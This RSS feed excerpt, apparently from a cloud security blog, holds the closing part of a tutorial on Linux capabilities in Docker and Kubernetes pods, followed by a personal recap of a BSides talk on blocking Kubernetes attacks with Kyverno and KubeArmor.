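<p>A quick aside: the <code>apt install</code> is only there for convenience. If the image has no package manager, you can still read the raw masks straight out of procfs and decode the hex on any machine that has libcap installed:</p>
<pre><code class="lang-bash"># Raw capability masks for the current process; no packages required.
grep ^Cap /proc/self/status

# The hex values vary by environment. Decode one wherever libcap is
# available, for example:
#   capsh --decode=00000000a80425fb
</code></pre>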
<p>Now let's change the pod definition to add and drop capabilities. Here is our new definition:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">cap-custom</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">containers:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">cap-custom</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">ubuntu:22.04</span>
    <span class="hljs-attr">command:</span> [<span class="hljs-string">"sleep"</span>, <span class="hljs-string">"infinity"</span>]
    <span class="hljs-attr">securityContext:</span>
      <span class="hljs-attr">capabilities:</span>
        <span class="hljs-attr">drop:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-string">CHOWN</span>
        <span class="hljs-attr">add:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-string">NET_ADMIN</span>
</code></pre>
<p>Deploy the pod and exec in:</p>
<pre><code class="lang-bash">kubectl apply -f cap-custom.yaml
kubectl <span class="hljs-built_in">exec</span> -it cap-custom -- /bin/bash
</code></pre>
<p>Install the relevant tools and check the capabilities. They will be as expected from our Docker experiment (you might see a lot of errors due to dropping <code>CAP_CHOWN</code>):</p>
<pre><code class="lang-bash">root@cap-custom:/<span class="hljs-comment"># apt update &amp;&amp; apt install -y \</span>
    libcap2-bin \
    strace \
    util-linux \
    iproute2 \
    procps \
    net-tools \
    python3 \
    curl \
    &amp;&amp; apt clean
root@cap-custom:/<span class="hljs-comment"># capsh --print</span>
Current: cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_admin,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep
Bounding <span class="hljs-built_in">set</span> =cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_admin,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient <span class="hljs-built_in">set</span> =
Current IAB: !cap_chown,!cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore
Securebits: 00/0x0/1<span class="hljs-string">'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: UNCERTAIN (0)</span>
</code></pre>
<p>Our quick tests showed the same rules apply whether you’re running a straight Docker container or a pod in Kubernetes:</p>
<ul>
<li><strong>In Docker</strong>, a container running as root starts with a limited set of default capabilities. We proved that if a capability like <code>CAP_NET_ADMIN</code> isn’t present, privileged operations (e.g., <code>ip link add</code>) fail with <code>Operation not permitted</code>.  </li>
<li><strong>In Kubernetes</strong>, the <code>securityContext</code> gives you fine-grained control. You can:<ul>
<li><strong>Drop</strong> capabilities you don’t want (e.g., <code>CAP_CHOWN</code>) to shrink the attack surface, even for root.</li>
<li><strong>Add</strong> specific capabilities (e.g., <code>CAP_NET_ADMIN</code>) to grant only what’s needed without giving the Pod full root privileges.</li>
</ul>
</li>
</ul>
<p>Capabilities are your surgical tool for granting <em>just enough privilege</em>, whether that’s binding to a low port, tweaking networking, or taking risky operations away from root entirely.</p>
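<p>If you want a starting point for your own manifests, a common hardening pattern is to drop everything and add back only what the workload needs. A sketch, with a placeholder name and image; adjust the <code>add</code> list to your actual workload:</p>
<pre><code class="lang-yaml">apiVersion: v1
kind: Pod
metadata:
  name: cap-minimal           # placeholder name
spec:
  containers:
  - name: cap-minimal
    image: nginx              # placeholder: a workload that binds port 80
    securityContext:
      capabilities:
        drop:
        - ALL                 # start from zero...
        add:
        - NET_BIND_SERVICE    # ...and grant back only what is needed
</code></pre>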
<hr />
<h2 id="heading-final-thoughts-why-capabilities-matter">Final Thoughts: Why Capabilities Matter</h2>
<p>From the early days of Linux, privilege was an all-or-nothing deal: UID 0 could do everything, and everyone else got <code>EPERM</code>. That simplicity came at a cost: giving a process one privileged action meant giving it <em>all</em> of them.</p>
<p>Linux 2.2’s introduction of <strong>capabilities</strong> changed that. Privilege could now be split into fine-grained units like <code>CAP_NET_BIND_SERVICE</code> or <code>CAP_SYS_PTRACE</code>, tied directly to specific syscalls. Our NET_BIND example showed how this plays out in practice:</p>
<ul>
<li><strong>Root-only service</strong>: Works, but comes with every privilege.</li>
<li><strong>Capability-only service</strong>: Works for the intended action (binding port 80) without extra power.</li>
<li><strong>No capability</strong>: Fails as expected.</li>
</ul>
<p>When we moved into containers, the same principle held:<br />Docker and Kubernetes both start with a reduced set of capabilities for root, and both let you <em>add</em> or <em>drop</em> individual privileges. Our tests showed:</p>
<ul>
<li>Dropping <code>CAP_CHOWN</code> removes the ability to change file ownership, even for root.</li>
<li>Without <code>CAP_NET_ADMIN</code>, network device management fails with <code>Operation not permitted</code>.</li>
<li>Adding just the required capability restores the intended function without re-granting full root.</li>
</ul>
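<p>The first bullet is easy to sanity-check from any shell, inside a container or not. Here is a small probe; it simply attempts the operation and reports, and it assumes a <code>nobody</code> user exists (as it does on stock images):</p>
<pre><code class="lang-bash"># Probe whether the current process can actually use CAP_CHOWN by
# attempting a chown on a throwaway file.
has_chown() {
    tmp=$(mktemp)
    if chown nobody "$tmp" 2>/dev/null; then
        r="available"
    else
        r="not available"
    fi
    rm -f "$tmp"
    echo "$r"
}

echo "CAP_CHOWN: $(has_chown)"
</code></pre>
<p>Run it as root in a default container and you should see <code>available</code>; run it again after <code>--cap-drop=CHOWN</code> and it flips to <code>not available</code>.</p>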
<p><strong>The takeaway:</strong> capabilities are one of the cleanest ways to shrink your attack surface without breaking legit workloads. I think of them as a firewall for syscalls. You can allow only what you need, block everything else, and never give away more than necessary.</p>
]]></content:encoded></item><item><title><![CDATA[When YAML Fights Back: My Runtime Security Talk at BSides]]></title><description><![CDATA[I gave a talk at BSides Las Vegas where we blocked a live threat right in the middle of a reverse shell attempt. With defense in depth of all things. Well, not live, but there were screencaps!
The talk focused on preventing attacks in Kubernetes usin...]]></description><link>https://cloudsecburrito.com/when-yaml-fights-back-my-runtime-security-talk-at-bsides</link><guid isPermaLink="true">https://cloudsecburrito.com/when-yaml-fights-back-my-runtime-security-talk-at-bsides</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[Speakers]]></category><category><![CDATA[Bsides]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 06 Aug 2025 05:53:59 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1754459559611/877f28c2-3c99-4f0c-baf1-9030fbf29982.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>I gave a talk at BSides Las Vegas where we blocked a live threat right in the middle of a reverse shell attempt. With defense in depth of all things. Well, not live, but there were screencaps!</p>
<p>The talk focused on preventing attacks in Kubernetes using policy-as-code tools like Kyverno and KubeArmor. No “AI for runtime.” Just a vulnerable Flask app, an RCE payload, and enforcement policies that shut it down cold. </p>
<p>Here’s a quick look back at the process and experience of the talk. This is less about the content, which you can grab <a target="_blank" href="https://github.com/sf-matt/k8s-enforcement-lab">here</a>. Ignore the excess commits to fix Markdown and other issues in the README.</p>
<blockquote>
<p>btw you can see it right at the beginning <a target="_blank" href="https://www.youtube.com/watch?v=6ZgnzCzz5gs">here</a></p>
</blockquote>
<hr />
<h2 id="heading-what-the-talk-covered">What the talk covered</h2>
<p>The core idea was simple: show how sad Kubernetes workloads can be blocked outright, and how any leftover bad behavior can be squashed at runtime. All of this was done with open source tools anyone can try.</p>
<p>The scenario started with a deliberately vulnerable Flask app (very contrived, but I think interesting nonetheless), running in a misconfigured pod with:</p>
<ul>
<li>The root user inside the container</li>
<li>A NodePort service exposed</li>
<li>And a neat little OS command injection bug</li>
</ul>
<p>From there, I walked through a simulated attack chain:
Attacker hits the exposed app ➝ gains shell access ➝ attempts the usual container hackery.</p>
<p>But then we stopped it at two key stages:</p>
<ul>
<li>At admission: Kyverno blocked the insecure pod from even deploying if it ran as root. No, you don't...</li>
<li>At runtime: KubeArmor enforced syscall-level restrictions via LSMs.</li>
</ul>
<p>This wasn’t abstract. The talk was built around a live lab, with policies, manifests, and attack steps running in a real cluster. Don't judge the actual apps and manifests too harshly.</p>
<hr />
<h2 id="heading-the-prep">The Prep</h2>
<p>The prep took a hella long time, probably because I completely overthought it. Going through the CFP was actually lightning quick, I had it done in a few days. I submitted it with little expectation of being selected. But on a Friday I found out I was selected. Felt good for a bit until I realized I actually had to flesh out a talk and slides. </p>
<p>It was through BSides Proving Grounds, which provided me an opportunity to have a mentor. Jimmy Shah was totally awesome and encouraging. He never told me what to do, but rather helped me when I was a bit off. </p>
<p>Sequence of Events:</p>
<ul>
<li>Developed and submitted CFP in May</li>
<li>Finished slides (mostly) in June</li>
<li>Spent ages rehearsing and revising</li>
<li>The day before BSides I did a dry run with a few folks and got great feedback at (literally) the last minute. </li>
</ul>
<p>No gambling the night before, just beer, of course.</p>
<hr />
<h2 id="heading-the-live-experience">The Live Experience</h2>
<p>This was the first time I delivered a self-crafted talk in a room of at least 30. I had spent days circulating the talk in my head. Trust me, I could hardly keep it from entering my dreams.</p>
<p>I spent quite a bit of time on this and went back and forth on a lot of things. But I think I came to something that worked at the end.</p>
<p>A few things stood out:</p>
<ul>
<li><p>You lose the nerves once you start talking. For the entire 25+ minutes (yes I was probably long) I felt fine, despite the occasional stumble and repetition.</p>
</li>
<li><p>I felt good because I believe the content is good and I did something right in my wheelhouse.</p>
</li>
<li><p>It wasn't a crowd that knew Kubernetes like the folks at KubeCon, but I think with the right anchors it made sense (I got this feedback from a few K8s amateurs).</p>
</li>
<li><p>It wasn't a cool talk, like those with awesome ways to make iPhones cool again, but I think it was just enough.</p>
</li>
</ul>
<hr />
<h2 id="heading-the-end">The End</h2>
<p>Once it was done, like the second after, I felt a huge relief. I won't watch it for a little while just to make sure I don't judge my cringy talk too harshly. Later I got to meet some really cool people and became known as the Kubemaster (definitely need a less praiseworthy handle). It was a great experience and I would encourage anyone who has not done something like this to give it a shot. Anyone reading this probably has better ideas. If anyone has made it this far, I hope to have the chance to do it again, but that will require some original thoughts. Back at you Red Bull Racing.</p>
]]></content:encoded></item></channel></rss>